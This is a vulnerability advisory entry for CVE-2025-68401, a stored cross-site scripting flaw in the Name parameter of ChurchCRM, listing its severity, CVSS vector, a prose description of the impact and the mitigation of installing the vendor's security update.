Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in ChurchCRM - CVE-2025-68401
Published: April 9, 2026
Vulnerability identifier: #VU125719
CSH Severity: Low
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:U/U:Clear
CVE-ID: CVE-2025-68401
CWE-ID: CWE-79
Exploitation vector: Remote access
Exploit availability:
No public exploit available
Vendor: ChurchCRM
Affected software:
ChurchCRM
ChurchCRM
Detailed vulnerability description
The vulnerability allows a remote user to execute arbitrary script in victims' browsers and disclose sensitive information.
The vulnerability exists due to cross-site scripting in the Name parameter when rendering stored user-supplied content. A remote privileged user can submit crafted HTML or JavaScript that is later viewed by other users to execute arbitrary script in victims' browsers and disclose sensitive information.
Where session cookies are not marked HttpOnly, the injected script can read document.cookie. Viewing the malicious content is required for exploitation, and privileged users such as admins or moderators may be affected.
How to mitigate CVE-2025-68401
Install security update from vendor's website.